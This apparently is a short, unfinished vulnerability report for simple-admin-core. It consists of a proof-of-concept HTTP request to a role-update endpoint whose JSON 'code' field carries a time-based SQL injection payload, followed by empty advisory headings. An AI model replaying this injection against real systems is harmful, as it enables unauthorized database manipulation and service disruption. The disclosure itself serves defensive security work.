POST /sys-api/role/update HTTP/1.1
Host: 192.168.236.54
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json, text/plain, */*
Accept-Language: zh
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0SWQiOjEsImV4cCI6MTc0Nzk5NTI4NSwiaWF0IjoxNzQ3NzM2MDg1LCJyb2xlSWQiOiIwMDEiLCJ1c2VySWQiOiIwMTk2ZWM2Mi1kNDkyLTcxZTYtOTAzZS1lYzk5ODAyMzZjMTEifQ.ya-pcDJ3_MrxadP_y7vLwxGb2l4tb7ITrC7Uh65Pjf8
Content-Length: 105
Origin: http://192.168.236.54
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://192.168.236.54/
Priority: u=0
{"sort":55,"status":1,"id":4,"name":"right","code":"1'or sleep(999)#","defaultRouter":"test","remark":""}
There is a restricted SQL injection vulnerability in simple-admin-core.
Affected versions
Vulnerability Analysis